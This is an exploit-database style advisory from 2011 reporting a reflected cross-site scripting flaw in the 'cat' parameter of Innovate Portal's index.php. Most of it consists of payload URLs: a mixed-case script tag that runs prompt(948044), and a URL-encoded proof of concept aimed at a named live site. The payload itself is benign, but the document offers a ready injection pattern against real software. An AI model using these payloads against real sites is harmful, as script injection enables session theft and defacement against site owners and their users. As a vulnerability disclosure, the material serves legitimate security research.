# Exploit Title: Innovate Portal XSS Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

XSS can be done using the command input

Vulnerable Page:
index.php

Example:
index.php?cat=<XSS  
Code>&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound


Exploit:
index.php?cat='"()%26%251<ScRiPt  
>prompt(948044)<%2fScRiPt>&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound  


POC:
http://www.innovate-board.de/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound



Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr